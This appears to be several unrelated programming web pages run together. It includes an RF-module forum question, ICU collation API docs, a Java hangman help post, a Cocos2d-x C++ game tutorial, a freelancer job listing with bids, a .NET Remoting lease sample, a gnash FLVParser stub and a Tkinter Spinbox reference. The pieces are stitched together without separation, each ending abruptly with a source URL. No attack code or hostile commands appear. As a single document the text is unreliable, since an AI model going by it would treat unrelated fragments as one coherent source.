Regarding code for the RF link module: I'm using 2 microprocessors communicating using these RF link modules. Is the given code to program only one microprocessor?
If I'm using 2 microprocessors, one connected to the transmitter and pin 9 of the mbed and the other connected to the receiver and pin 10 of the mbed, would the transmitter microcontroller only have the transmitter code and would the receiver microcontroller have the corresponding receiver code separately? Thank you very much for clarifying this. Regards.
The UCollationElements API is used as an iterator to walk through each character of an international string. Use the iterator to return the ordering priority of the positioned character. The ordering priority of a character, which we refer to as a key, defines how a character is collated in the given collation object. For example, consider the following in Spanish:

    "ca"  -> the first key is key('c') and the second key is key('a').
    "cha" -> the first key is key('ch') and the second key is key('a').

Example of the iterator's use (the declarations at the top are added here so the fragment is self-contained):

    UChar *s;
    int32_t order;
    UCollationElements *c;
    UCollator *coll;
    UErrorCode success = U_ZERO_ERROR;
    UErrorCode status = U_ZERO_ERROR;

    s = (UChar*)malloc(sizeof(UChar) * (strlen("This is a test") + 1));
    u_uastrcpy(s, "This is a test");
    coll = ucol_open(NULL, &success);
    c = ucol_openElements(coll, s, u_strlen(s), &status);
    order = ucol_next(c, &success);
    ucol_reset(c);
    order = ucol_prev(c, &success);
    free(s);
    ucol_closeElements(c);
    ucol_close(coll);

ucol_next() returns the collation order of the next character, and ucol_prev() returns the collation order of the previous one. Iterating forward and then backward (or vice versa) over the same string yields equivalent sequences of collation orders, if collation orders with the value UCOL_IGNORABLE are ignored. Characters are compared based on the comparison level of the collator. A collation order consists of a primary order, a secondary order and a tertiary order. The data type of the collation order is t_int32.

Definition in file ucoleitr.h.

    #include "unicode/utypes.h"
    #include "unicode/ucol.h"
Hey people, I am new to Java and I am currently constructing a hangman game. The game asks the user to enter a word (3 or more characters long). Then it prompts the user to enter a single character or the complete word in a message input dialog which shows the word length as underscores ("_"). If the user enters a single character, the dashes are replaced by that character; if the user enters the right word, a message box appears ("correct"). I am asking for help at the point where the user is prompted to enter a single character or a complete word. How am I going to re-show the input dialog with the dashes replaced? How is it going to check the hidden word character by character? Thanks.

    import javax.swing.*;

    public class StringGame {

        public String word;

        /**
         * Creates a new <code>StringGame</code> instance.
         */
        public StringGame() {
        }

        public static void main(String[] args) {
            StringGameFrame frame = new StringGameFrame();
            frame.setVisible(true);

            StringGame game = new StringGame();

            /* tot is the masked display string built from the word the user typed */
            String tot = "";
            String tot2 = "";
            char cha;

            /* the program asks the user to enter a word */
            String word = JOptionPane.showInputDialog(null, "Please enter a word.");
            String step1;

            /* check the word length; if it is 2 characters or fewer,
               the user is prompted to re-enter a valid word */
            if (word.length() <= 2) {
                do {
                    step1 = JOptionPane.showInputDialog(null,
                            "Please enter a word with 3 or more characters.");
                } while (step1.length() <= 2);
                word = step1;
            }

            for (int i = 1; i <= word.length(); i++) {
                tot = tot + "_ ";
            }

            String step2 = JOptionPane.showInputDialog(null, tot
                    + "\nPlease enter a single character, or a word as your final guess.");

            if (step2.length() <= 1) {
                // Originally marked "FAULTY PART"; fixed as follows:
                // - loop bound changed from i <= word.length() to i < word.length(),
                //   since charAt(word.length()) throws StringIndexOutOfBoundsException
                // - charAt is a method, so word.charAt(i), not word.charAt[i]
                // - char is a primitive and has no equals(); compare with ==
                //   against step2.charAt(0)
                for (int i = 0; i < word.length(); i++) {
                    cha = word.charAt(i);
                    if (cha == step2.charAt(0)) {
                        tot2 = tot2 + step2 + " ";
                    } else {
                        tot2 = tot2 + "_ ";
                    }
                }
                // tot2 now holds the updated display string; it still needs to be
                // shown in the next input dialog to continue the game.
            } else {
                if (step2.equals(word)) {
                    JOptionPane.showMessageDialog(null, "You guessed correctly");
                } else {
                    JOptionPane.showMessageDialog(null, "You guessed incorrectly");
                }
            }
        }
    }
Cocos2d-x Tutorial for Beginners

Cocos2d-x is a fast, powerful, and easy-to-use open source 2D game engine. It's very similar to Apple's Sprite Kit, but has one key advantage: Cocos2d-x is cross-platform. This means with one set of code, you can make games for iOS, Android, Windows Phone, Mac OS X, Windows Desktop and Linux. This is huge for indie game devs! In this tutorial, you will learn how to create a simple 2D game in Cocos2d-x with C++. And yes — there will be ninjas! :]

Getting Started

Download the latest version of Cocos2d-x from the Cocos2d-x website; this tutorial uses version 3.5. Place the downloaded file where you'd like to store your Cocos2d-x installation, such as in your home directory, then unzip it.

Open Terminal and cd into the folder you just extracted. For example, if you placed the project in your home directory, run the following command:

    cd ~/cocos2d-x-3.5/

Now run the following command:

    python setup.py

This sets up the necessary shell environment variables. When it prompts you to configure the Android-specific variables NDK_ROOT, ANDROID_SDK_ROOT and ANT_ROOT, just press Enter three times to finish the configuration.

Note: To check your Python version, type python on the command line and it will display the version (then hit Ctrl-D to exit). If you have an older version of Python, install the latest version of Python at python.org.

As you can see in the following screenshot, the script instructs you to execute another command to complete the setup. Enter the command as the script's output instructed. A great timesaving tip: you can use a tilde (~) in place of /Users/your_user_name, so to save keystrokes you could type the following:

    source ~/.zshrc (or source ~/.bash_profile)

The command you entered simply re-processes your shell configuration and gives it access to the new variables. Now you can call the cocos command in Terminal from any directory.
Run the following command to create a C++ game template named SimpleGame:

    cocos new -l cpp -d ~/Cocos2d-x-Tutorial SimpleGame

This creates a directory named Cocos2d-x-Tutorial in your home directory, and inside that, a sub-directory named SimpleGame that contains your project's files.

Note: To learn about the available cocos subcommands, type cocos --help or cocos -h. You can also learn about any subcommand's options by appending --help or -h, such as cocos new -h to see the options for the new command.

Double-click ~/Cocos2d-x-Tutorial/SimpleGame/proj.ios_mac/SimpleGame.xcodeproj in Finder to open the project in Xcode. Once you're inside Xcode, ensure that SimpleGame Mac is the active scheme, as shown below:

While Cocos2d-x is capable of building games for many platforms, in this tutorial you'll focus on making an OS X app. Porting this project to other platforms is a trivial (yes, trivial!) matter discussed briefly at the end of this tutorial. Build and run your app to see the template project in all its glory:

Resolution Setup

By default, Cocos2d-x games are named "MyGame" and have a resolution of 960×640, but those details are easy to change. Open AppDelegate.cpp and find the following line inside AppDelegate::applicationDidFinishLaunching:

    glview = GLViewImpl::create("My Game");

Replace that line with the following code:

    glview = GLViewImpl::createWithRect("SimpleGame", Rect(0, 0, 480, 320), 1.0);

This changes the app's name to "SimpleGame" and sets its resolution to 480×320 to match the background art included with the template. Build and run your app again to see your new, smaller game:

Notice the third argument you passed to createWithRect — 1.0. This parameter scales the frame, which is usually used for testing resolutions larger than your monitor. For example, to test a 1920×1080 resolution on a monitor smaller than 1920×1080, you could pass 0.5 to scale the window to 960×540.
While this call to createWithRect changes the game's frame on desktops, it doesn't work this way on iOS devices; instead, the game's resolution matches the screen size. Here is how it looks on an iPhone 6:

So how do you handle multiple resolutions? In this tutorial, you'll create a single set of game resources based on a 960×640 resolution, then simply scale the assets up or down as necessary at runtime. To implement this, add the following code inside AppDelegate::applicationDidFinishLaunching, just above the line that calls setDisplayStats on director:

    // 1
    Size designSize = Size(480, 320);
    Size resourceSize = Size(960, 640);
    // 2
    director->setContentScaleFactor(resourceSize.height / designSize.height);
    director->getOpenGLView()->setDesignResolutionSize(
        designSize.width, designSize.height, ResolutionPolicy::FIXED_HEIGHT);

Here's what the code above does:
- Here you define designSize – the size you're using when creating your game logic – and resourceSize – the size on which all your art assets are based.
- These lines tell your game's Director to scale the assets as necessary based on the design and resource sizes you provided.

For a detailed explanation of how Cocos2d-x handles resolutions, please refer to the Cocos2d-x wiki entry on Multi-resolution adaptation.

Adding a Sprite

Next, download the resources file for this project and unzip it to a convenient location. Select all the files in the SimpleGameResources folder you just extracted and drag them into the Resources group in your Xcode project. In the dialog that appears, be sure to check Copy items if needed, SimpleGame iOS and SimpleGame Mac before clicking Finish:

Next, open HelloWorldScene.h and add the following line just after the line that includes cocos2d.h:

    using namespace cocos2d;

This specifies you'll be using the cocos2d namespace; this lets you do things like write Sprite* instead of cocos2d::Sprite*. It's not absolutely necessary, but it certainly makes development more pleasant.
:]

Now you'll need a private member variable to point to your player sprite. Add the following code to the HelloWorld declaration:

    private:
        Sprite* _player;

Next, open HelloWorldScene.cpp and replace the contents of the HelloWorld::init method with the following:

    // 1
    if ( !Layer::init() ) {
        return false;
    }
    // 2
    auto origin = Director::getInstance()->getVisibleOrigin();
    auto winSize = Director::getInstance()->getVisibleSize();
    // 3
    auto background = DrawNode::create();
    background->drawSolidRect(origin, winSize, Color4F(0.6, 0.6, 0.6, 1.0));
    this->addChild(background);
    // 4
    _player = Sprite::create("player.png");
    _player->setPosition(Vec2(winSize.width * 0.1, winSize.height * 0.5));
    this->addChild(_player);
    return true;

Here's the play-by-play of this method:
- First you call the super class's init method. Only if this succeeds do you proceed with HelloWorldScene's setup.
- You then get the window's bounds using the game's Director singleton.
- You then create a DrawNode to draw a gray rectangle that fills the screen and add it to the scene. This serves as your game's background.
- Finally, you create the player sprite by passing in the image's name. You position it 10% from the left edge of the screen, centered vertically, and add it to the scene.

Build and run your app; voila, ladies and gentlemen, the ninja has entered the building! :]

Moving Monsters

Your ninja needs a purpose in life, so you'll add some monsters to your scene for your ninja to fight. To make things more interesting, you want the monsters to move around – otherwise, it wouldn't prove to be much of a challenge! You'll create the monsters slightly off-screen to the right, and set up an action for them telling them to move to the left.
First, open HelloWorldScene.h and add the following method declaration:

    void addMonster(float dt);

Then add the following method implementation inside HelloWorldScene.cpp:

    void HelloWorld::addMonster(float dt) {
        auto monster = Sprite::create("monster.png");

        // 1
        auto monsterContentSize = monster->getContentSize();
        auto selfContentSize = this->getContentSize();
        int minY = monsterContentSize.height / 2;
        int maxY = selfContentSize.height - monsterContentSize.height / 2;
        int rangeY = maxY - minY;
        int randomY = (rand() % rangeY) + minY;
        monster->setPosition(Vec2(selfContentSize.width + monsterContentSize.width / 2, randomY));
        this->addChild(monster);

        // 2
        int minDuration = 2.0;
        int maxDuration = 4.0;
        int rangeDuration = maxDuration - minDuration;
        int randomDuration = (rand() % rangeDuration) + minDuration;

        // 3
        auto actionMove = MoveTo::create(randomDuration, Vec2(-monsterContentSize.width / 2, randomY));
        auto actionRemove = RemoveSelf::create();
        monster->runAction(Sequence::create(actionMove, actionRemove, nullptr));
    }

It's relatively straightforward, but here's what the above code does:
- The first part of this method is similar to what you did earlier with the player: it creates a monster sprite and places it just offscreen to the right. It sets its y-position to a random value to keep things interesting.
- Next, the method calculates a random duration between two and four seconds for the action it's about to add to the monster. Each monster will move the same distance across the screen, so varying the duration results in monsters with random speeds.
- Finally, the method creates an action that moves the monster across the screen from right to left and instructs the monster to run it. This is explained in more detail below.

Cocos2d-x provides lots of extremely handy built-in actions that help you easily change the state of sprites over time, including move actions, rotate actions, fade actions, animation actions, and more.
Here you use three actions on the monster:
- MoveTo: Moves an object from one point to another over a specific amount of time.
- RemoveSelf: Removes a node from its parent, effectively "deleting it" from the scene. In this case, you use this action to remove the monster from the scene when it is no longer visible. This is important because otherwise you'd have an endless supply of monsters and would eventually consume all your device's resources.
- Sequence: Lets you perform a series of other actions in order, one at a time. This means you can have the monster move across the scene and remove itself from the screen when it reaches its destination.

There's one last thing to do before you let your ninja go to town — you need to actually call the method to create monsters! Just to make things fun, you'll create monsters that spawn continuously. Simply add the following code to the end of HelloWorld::init, just before the return statement:

    srand((unsigned int)time(nullptr));
    this->schedule(schedule_selector(HelloWorld::addMonster), 1.5);

srand((unsigned int)time(nullptr)); seeds the random number generator. If you didn't do this, your random numbers would be the same every time you ran the app. That wouldn't feel very random, would it? :]

You then pass HelloWorld::addMonster into the schedule method, which will call addMonster() every 1.5 seconds. Here Cocos2d-x takes advantage of C++'s pointers to member functions. If you don't understand how this works, please refer to a C++ reference on pointers to member functions for more information.

That's it! Build and run your project; you should now see monsters happily (or angrily, as the case may be!) moving across the screen:

Shooting Projectiles

Your brave little ninja needs a way to protect himself. There are many ways to implement firepower in a game, but in this project you'll have the user click or tap the screen to fire a projectile in the direction of the click or tap. Pew-pew!
:]

To keep things simple, you'll implement this with a MoveTo action — but this means you'll need to do a little math. The MoveTo action requires a destination for the projectile, but you can't use the input location directly because that point only represents the direction to shoot relative to the player. You want to keep the bullet moving through that point until the bullet arrives at the final destination off-screen. Here's a picture that illustrates the matter:

The x and y offsets from the origin point to the touched location create a small triangle; you just need to make a big triangle with the same ratio – and you know you want one of the endpoints to be off-screen. Performing these calculations is a snap with Cocos2d-x's included vector math routines. But before you can calculate where to move, you need to enable input event handling to figure out where the user touched! Add the following code to the end of HelloWorld::init, just above the return statement:

    auto eventListener = EventListenerTouchOneByOne::create();
    eventListener->onTouchBegan = CC_CALLBACK_2(HelloWorld::onTouchBegan, this);
    this->getEventDispatcher()->addEventListenerWithSceneGraphPriority(eventListener, _player);

Cocos2d-x versions 3 and up use EventDispatcher to dispatch various events, such as touch, accelerometer and keyboard events.

Note: Throughout this discussion, the term "touch" refers to taps on a touch device as well as clicks on a desktop. Cocos2d-x uses the same methods for handling both types of events.

In order to receive events from the EventDispatcher, you need to register an EventListener. There are two types of touch event listeners:
- EventListenerTouchOneByOne: This type calls your callback method once for each touch event.
- EventListenerTouchAllAtOnce: This type calls your callback method once with all of the touch events.

Touch event listeners support four callbacks, but you only need to bind methods for the events you care about.
- onTouchBegan: Called when your finger first touches the screen. If you are using EventListenerTouchOneByOne, you must return true in order to receive any of the other three touch events.
- onTouchMoved: Called when your finger, already touching the screen, moves without lifting off the screen.
- onTouchEnded: Called when your finger lifts off the screen.
- onTouchCancelled: Called in certain circumstances that stop event handling, like when you are touching the screen and then something like a phone call interrupts the app.

In this game, you really only care about when touches occur. Declare your callback to receive touch notifications in HelloWorldScene.h like so:

    bool onTouchBegan(Touch *touch, Event *unused_event);

Then implement your callback in HelloWorldScene.cpp:

    bool HelloWorld::onTouchBegan(Touch *touch, Event *unused_event) {
        // 1 - Just an example for how to get the _player object
        //auto node = unused_event->getCurrentTarget();

        // 2
        Vec2 touchLocation = touch->getLocation();
        Vec2 offset = touchLocation - _player->getPosition();

        // 3
        if (offset.x < 0) {
            return true;
        }

        // 4
        auto projectile = Sprite::create("projectile.png");
        projectile->setPosition(_player->getPosition());
        this->addChild(projectile);

        // 5
        offset.normalize();
        auto shootAmount = offset * 1000;

        // 6
        auto realDest = shootAmount + projectile->getPosition();

        // 7
        auto actionMove = MoveTo::create(2.0f, realDest);
        auto actionRemove = RemoveSelf::create();
        projectile->runAction(Sequence::create(actionMove, actionRemove, nullptr));

        return true;
    }

There's a lot going on in the method above, so take a moment to review it step by step.
- The first line is commented out, but it's there to show you how you can access the _player object that you passed as the second parameter to addEventListenerWithSceneGraphPriority(eventListener, _player).
- Here you get the coordinate of the touch within the scene's coordinate system and then calculate the offset of this point from the player's current position.
This is one example of vector math in Cocos2d-x.
- If offset's x value is negative, it means the player is trying to shoot backwards. This is not allowed in this game (real ninjas never look back!), so simply return without firing a projectile.
- Create a projectile at the player's position and add it to the scene.
- You then call normalize() to convert the offset into a unit vector, which is a vector of length 1. Multiplying that by 1000 gives you a vector of length 1000 that points in the direction of the user's tap. Why 1000? That length should be enough to extend past the edge of your screen at this resolution :]
- Adding the vector to the projectile's position gives you the target position.
- Finally, you create an action to move the projectile to the target position over two seconds and then remove itself from the scene.

Build and run your app; touch the screen to make your ninja fire away at the oncoming hordes!

Collision Detection and Physics

You now have shurikens flying everywhere — but what your ninja really wants to do is to lay some smack down. So you'll need some code to detect when your projectiles intersect their targets. One nice thing about Cocos2d-x is it comes with a physics engine built right in! Not only are physics engines great for simulating realistic movement, but they are also great for detecting collisions. You'll use Cocos2d-x's physics engine to determine when monsters and projectiles collide.

Start by adding the following code to HelloWorldScene.cpp, just above the implementation of HelloWorld::createScene:

    enum class PhysicsCategory {
        None = 0,
        Monster = (1 << 0),    // 1
        Projectile = (1 << 1), // 2
        All = PhysicsCategory::Monster | PhysicsCategory::Projectile // 3
    };

These bit masks define the physics categories you'll need in a bit - no pun intended! :] Here you've created two types, Monster and Projectile, along with two special values to specify no type or all types.
You'll use these categories to assign types to your objects, allowing you to specify which types of objects are allowed to collide with each other.

Note: You may be wondering what this fancy syntax is. The category on Cocos2d-x is simply a single 32-bit integer; this syntax sets specific bits in the integer to represent different categories, giving you 32 possible categories max. Here you set the first bit to indicate a monster, the next bit over to represent a projectile, and so on.

Next, replace the first line of HelloWorld::createScene with the following code:

    auto scene = Scene::createWithPhysics();
    scene->getPhysicsWorld()->setGravity(Vec2(0, 0));
    scene->getPhysicsWorld()->setDebugDrawMask(PhysicsWorld::DEBUGDRAW_ALL);

This creates a Scene with physics enabled. Cocos2d-x uses a PhysicsWorld to control its physics simulation. Here you set the world's gravity to zero in both directions, which essentially disables gravity, and you enable debug drawing to see your physics bodies. It's helpful to enable debug drawing while you're prototyping physics interactions so you can ensure things are working properly.

Inside HelloWorld::addMonster, add the following code right after the first line that creates the monster sprite:

    // 1
    auto monsterSize = monster->getContentSize();
    auto physicsBody = PhysicsBody::createBox(Size(monsterSize.width, monsterSize.height),
                                              PhysicsMaterial(0.1f, 1.0f, 0.0f));
    // 2
    physicsBody->setDynamic(true);
    // 3
    physicsBody->setCategoryBitmask((int)PhysicsCategory::Monster);
    physicsBody->setCollisionBitmask((int)PhysicsCategory::None);
    physicsBody->setContactTestBitmask((int)PhysicsCategory::Projectile);
    monster->setPhysicsBody(physicsBody);

Here's what the above code does:
- Creates a PhysicsBody for the sprite. Physics bodies represent the object in Cocos2d-x's physics simulation, and you can define them using any shape. In this case, you use a rectangle of the same size as the sprite as a decent approximation for the monster.
You could use a more accurate shape, but simpler shapes are good enough for most games and more performant.
- Sets the sprite to be dynamic. This means that the physics engine will not apply forces to the monster. Instead, you'll control it directly through the MoveTo actions you created earlier.
- Here, you set the category, collision and contact test bit masks:
  - Category: defines the object's type – Monster.
  - Collision: defines what types of objects should physically affect this object during collisions – in this case, None. Because this object is also dynamic, this field has no effect but is included here for the sake of completeness.
  - Contact Test: defines the object types with which collisions should generate notifications – Projectile. You'll register for and handle these notifications just a bit later in the tutorial.
- Finally, you assign the physics body to the monster.

Next, add the following code to HelloWorld::onTouchBegan, right after the line that sets projectile's position:

    auto projectileSize = projectile->getContentSize();
    auto physicsBody = PhysicsBody::createCircle(projectileSize.width / 2);
    physicsBody->setDynamic(true);
    physicsBody->setCategoryBitmask((int)PhysicsCategory::Projectile);
    physicsBody->setCollisionBitmask((int)PhysicsCategory::None);
    physicsBody->setContactTestBitmask((int)PhysicsCategory::Monster);
    projectile->setPhysicsBody(physicsBody);

This is very similar to the physics setup you performed for the monsters, except it uses a circle instead of a rectangle to define the physics body. Note that it's not absolutely necessary to set the contact test bit mask because the monsters are already checking for collisions with projectiles, but it helps make your code's intention more clear.

Build and run your project now; you'll see red shapes superimposed over your physics bodies, as shown below:

Your projectiles are set up to hit monsters, so you need to remove both bodies when they collide. Remember that physics world from earlier?
Well, you can set a contact delegate on it to be notified when two physics bodies collide. There you'll write some code to examine the categories of the objects, and if they're the monster and projectile, you'll make them go boom!

First, add the following method declaration to HelloWorldScene.h:

    bool onContactBegan(PhysicsContact &contact);

This is the method you'll register to receive the contact events. Next, implement the following method in HelloWorldScene.cpp:

    bool HelloWorld::onContactBegan(PhysicsContact &contact) {
        auto nodeA = contact.getShapeA()->getBody()->getNode();
        auto nodeB = contact.getShapeB()->getBody()->getNode();
        nodeA->removeFromParent();
        nodeB->removeFromParent();
        return true;
    }

The PhysicsContact passed to this method contains information about the collision. In this game, you know that the only objects colliding will be monsters and projectiles. Therefore, you get the nodes involved in the collision and remove them from the scene.

Finally, you need to register to receive contact notifications. Add the following lines to the end of HelloWorld::init, just before the return statement:

    auto contactListener = EventListenerPhysicsContact::create();
    contactListener->onContactBegin = CC_CALLBACK_1(HelloWorld::onContactBegan, this);
    this->getEventDispatcher()->addEventListenerWithSceneGraphPriority(contactListener, this);

This creates a contact listener, registers HelloWorld::onContactBegan to receive events and adds the listener to the EventDispatcher. Now, whenever two physics bodies collide and their category bit masks match their contact test bit masks, the EventDispatcher will call onContactBegan.

Build and run your app; now when your projectiles intersect targets they should disappear:

Most ninjas are silent, but not this one! Time to add some sound to your game.

Finishing Touches

You're pretty close to having a workable (but extremely simple) game now.
You just need to add some sound effects and music (since what kind of game doesn't have sound!) and some simple game logic. Cocos2d-x comes with a simple audio engine called CocosDenshion which you'll use to play sounds. Note: Cocos2d-x also includes a second audio engine designed to replace the simple audio engine module. However, it is still experimental and it is not available for all the supported platforms, so you won't use it here. The project already contains some cool background music and an awesome "pew-pew" sound effect that you imported earlier. You just need to play them! To do this, add the following code to the top of HelloWorldScene.cpp, after the other #include statement:

#include "SimpleAudioEngine.h"
using namespace CocosDenshion;

This imports the SimpleAudioEngine module and specifies that you'll be using the CocosDenshion namespace in this file. Next, add the following defines to HelloWorldScene.cpp, just above the PhysicsCategory enum:

#define BACKGROUND_MUSIC_SFX "background-music-aac.mp3"
#define PEW_PEW_SFX "pew-pew-lei.mp3"

Here you define two string constants: BACKGROUND_MUSIC_SFX and PEW_PEW_SFX. This simply keeps your filenames in a single place, which makes it easier to change them later. Organizing your code like this (or even better, using a completely separate file) makes it easier to support platform-specific changes like using .mp3 files on iPhone and .wav files on Windows Phone. Now add the following line to the end of HelloWorld::init, just before the return statement:

SimpleAudioEngine::getInstance()->playBackgroundMusic(BACKGROUND_MUSIC_SFX, true);

This starts the background music playing as soon as your scene is set up. As for the sound effect, add the following line to HelloWorld::onTouchBegan, just above the return statement:

SimpleAudioEngine::getInstance()->playEffect(PEW_PEW_SFX);

This plays a nice "pew-pew" sound effect whenever the ninja attacks. Pretty handy, eh?
You can play a sound effect with only a single line of code. Build and run, and enjoy your groovy tunes! Where to Go From Here? Here is the finished example game from the above tutorial. I hope you enjoyed learning about Cocos2d-x and feel inspired to make your own game! To learn more about Cocos2d-x, check out the Cocos2d-x website for great learning resources. If you have any questions or comments about this tutorial, please join the discussion below!
https://www.raywenderlich.com/95835/cocos2d-x-tutorial-beginners
Website Redesign and added functionality
Budget: $300-1500 USD

In need of a website redesign/update. We are an Adobe partner and sell Adobe software and offer training as well. The site will need a registration system for clients to register for a free seminar (online) as well as register/order training courses either at a client's site or in a public class. A new logo, banners and SEO are desired as well. Please send PM for more info and current URL (which will be changing).

51 freelancers are bidding on average $1022 for this job

Hi, PM more details for a meaningful discussion. We have designed & developed more than 1000+ websites & can assure you of professionalism, quality & timely deliveries. View our reviews + projects won list. More

Hi, We have over 5 years of experience of web designing, search engine optimisation and web programming on PHP and other web technologies, and have programmed many applications. We are confident to complete this project. More

hello, Kindly see PMB Thanks

Hi, pls check pmb, thanx

I run a Sacramento, CA website design firm with 8 years of design experience developing over 80 websites, and 13 years of IT Engineering experience. Your bid includes a complete design of your site to your specific requirements. More

Please check your PMB for our proposal and our full portfolio. Thank you. EncodedART Inc – A Solution Provider Company.

plz check PMB

Hello, Japple! We are very glad you gave us a chance to place a bid on the project. I encourage you to view our portfolio at [url removed, login to view] We have good opportunities to develop this project. More

We have a team of highly qualified and creative professionals. Give us a chance to show our talents and we assure you quality. [url removed, login to view]

Hello Sir, We are a well established offshore company of more than five years. We have experienced developers (PHP, ASP, ASP.NET, MYSQL, C#, JAVA, JSP, C++ etc.) who are dedicated in their respective fields. More

Please check the PMB. Thanks

Hello, Thank you for your time to read our proposal. Mxicoders is a leading IT solutions company to provide e-commerce, e-business and branding solutions to small and medium size business worldwide. More
https://www.tr.freelancer.com/projects/flash-website-design/website-redesign-added-functionality/
ILease Interface Assembly: mscorlib (in mscorlib.dll). The following example consists of three assemblies: a client, a server, and a library shared by the client and server. Compile the library first, then the client and server. The following commands compile the Visual Basic files; to compile the C# files, use the csc command and .cs file extensions. The file names shown are only suggestions. It is not necessary to use all Visual Basic files or all C# files; once compiled, the assemblies work together regardless of the source language. To run the example, open two command windows. Run the server first, then run the client. If you place the client and server in separate folders, you must place a copy of the shared library in each folder. The following code is for the shared library.

using System;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Lifetime;
using System.Security.Permissions;

namespace RemotingSamples
{
    public class HelloService : MarshalByRefObject
    {
        public string HelloMethod(string name)
        {
            Console.WriteLine("Hello " + name);
            return "Hello " + name;
        }

        [SecurityPermissionAttribute(SecurityAction.LinkDemand, Flags=SecurityPermissionFlag.Infrastructure)]
        public override object InitializeLifetimeService()
        {
            ILease baseLease = (ILease)base.InitializeLifetimeService();
            if (baseLease.CurrentState == LeaseState.Initial)
            {
                // For demonstration the initial time is kept small;
                // in actual scenarios it will be large.
                baseLease.InitialLeaseTime = TimeSpan.FromSeconds(15);
                baseLease.RenewOnCallTime = TimeSpan.FromSeconds(15);
                baseLease.SponsorshipTimeout = TimeSpan.FromMinutes(2);
            }
            return baseLease;
        }
    }
}

The following code is for the client assembly.

using System;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Tcp;
using System.Runtime.Remoting.Lifetime;

namespace RemotingSamples
{
    class HelloClient
    {
        static void Main()
        {
            // Register the channel.
            TcpChannel myChannel = new TcpChannel();
            ChannelServices.RegisterChannel(myChannel);
            RemotingConfiguration.RegisterActivatedClientType(
                typeof(HelloService), "Tcp://localhost:8085");
            TimeSpan myTimeSpan = TimeSpan.FromMinutes(10);

            // Create a remote object.
            HelloService myService = new HelloService();
            ILease myLease;
            myLease = (ILease)RemotingServices.GetLifetimeService(myService);
            if (myLease == null)
            {
                Console.WriteLine("Cannot lease.");
                return;
            }
            Console.WriteLine("Initial lease time is " + myLease.InitialLeaseTime);
            Console.WriteLine("Current lease time is " + myLease.CurrentLeaseTime);
            Console.WriteLine("Renew on call time is " + myLease.RenewOnCallTime);
            Console.WriteLine("Sponsorship timeout is " + myLease.SponsorshipTimeout);
            Console.WriteLine("Current lease state is " + myLease.CurrentState.ToString());

            // Register with a sponsor.
            ClientSponsor mySponsor = new ClientSponsor();
            myLease.Register(mySponsor);
            Console.WriteLine("Wait for lease to expire (approx. 15 seconds)...");
            System.Threading.Thread.Sleep(myLease.CurrentLeaseTime);
            Console.WriteLine("Current lease time before renewal is " + myLease.CurrentLeaseTime);

            // Renew the lease time.
            myLease.Renew(myTimeSpan);
            Console.WriteLine("Current lease time after renewal is " + myLease.CurrentLeaseTime);

            // Call the remote method.
            Console.WriteLine("Remote method output is " + myService.HelloMethod("Microsoft"));
            myLease.Unregister(mySponsor);
            GC.Collect();
            GC.WaitForPendingFinalizers();

            // Register with lease time of 15 minutes.
            myLease.Register(mySponsor, TimeSpan.FromMinutes(15));
            Console.WriteLine("Registered client with lease time of 15 minutes.");
            Console.WriteLine("Current lease time is " + myLease.CurrentLeaseTime);

            // Call the remote method.
            Console.WriteLine("Remote method output is " + myService.HelloMethod("Microsoft"));
            myLease.Unregister(mySponsor);
        }
    }
}

The following code is for the server assembly.

using System;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Tcp;
using System.Runtime.Remoting.Lifetime;

namespace RemotingSamples
{
    class HelloServer
    {
        static void Main()
        {
            TcpChannel myChannel = new TcpChannel(8085);
            ChannelServices.RegisterChannel(myChannel);
            RemotingConfiguration.RegisterActivatedServiceType(typeof(HelloService));
            Console.WriteLine("Server started.");
            Console.WriteLine("Hit enter to terminate...");
            Console.ReadLine();
        }
    }
}
https://technet.microsoft.com/en-us/library/system.runtime.remoting.lifetime.ilease(v=vs.80).aspx
The FLVParser class parses FLV streams.

#include <FLVParser.h>

Constructor: creates an FLV parser reading input from the given IOChannel. References paddingBytes. Destructor: kills the parser. Returns the number of bytes parsed so far. Reimplemented from gnash::media::MediaParser. Seeks to the closest possible position to the given position, and returns the new position. Implements gnash::media::MediaParser. paddingBytes is the size of padding for all buffers that might be read by FFMPEG. This possibly also applies to other media handlers (gst). Ideally this would be taken from the current Handler, but we don't know about it here. Referenced by FLVParser().
http://gnashdev.org/doc/html/classgnash_1_1media_1_1FLVParser.html
(new in Tk 8.4) The Spinbox widget is a variant of the standard Tkinter Entry widget, which can be used to select from a fixed number of values.

When to use the Spinbox Widget

The Spinbox widget can be used instead of an ordinary Entry, in cases where the user only has a limited number of ordered values to choose from. Note that the spinbox widget is only available in Python 2.3 and later, when linked against Tk 8.4 or later. Also note that several Tk spinbox methods appear to be missing from the Tkinter bindings in Python 2.3.

Patterns

The spinbox behaves pretty much like an ordinary Entry widget. The main difference is that you can specify what values to allow, either as a range, or using a tuple.

from Tkinter import *

master = Tk()
w = Spinbox(master, from_=0, to=10)
w.pack()
mainloop()

You can specify a set of values instead of a range:

w = Spinbox(values=(1, 2, 4, 8))
w.pack()

Reference

- Spinbox(master=None, **options) (class): A spinbox widget.
 - master - Parent widget.
 - **options - Widget options. See the description of the config method for a list of available options.
- bbox(index): Returns the bounding box of a given character.
- config(**options): Modifies one or more widget options. If no options are given, the method returns a dictionary containing all current option values.
 - **options - Widget options.
 - activebackground= - Default is system specific. (activeBackground/Background)
 - background= - Default is system specific. (background/Background)
 - bd= - Same as borderwidth.
 - bg= - Same as background.
 - borderwidth= - Widget border width. The default is system specific, but is usually a few pixels. (borderWidth/BorderWidth)
 - buttonbackground= - Button background color. Default is system specific. (Button.background/Background)
 - buttoncursor= - Cursor to use when the mouse pointer is moved over the button part of this widget. No default value. (Button.cursor/Cursor)
 - buttondownrelief= - The border style to use for the down button.
Default is RAISED. (Button.relief/Relief)
 - buttonuprelief= - The border style to use for the up button. Default is RAISED. (Button.relief/Relief)
 - command= - A function or method that should be called when a button is pressed. No default value. (command/Command)
 - cursor= - The cursor to use when the mouse pointer is moved over the entry part of this widget. Default is a text insertion cursor (usually XTERM). (cursor/Cursor)
 - disabledbackground= - The background color to use when the widget is disabled. The default is system specific. (disabledBackground/DisabledBackground)
 - disabledforeground= - The text color to use when the widget is disabled. The default is system specific. (disabledForeground/DisabledForeground)
 - exportselection= - Default is True. (exportSelection/ExportSelection)
 - fg= - Same as foreground.
 - font= - The font to use in this widget. Default is system specific. (font/Font)
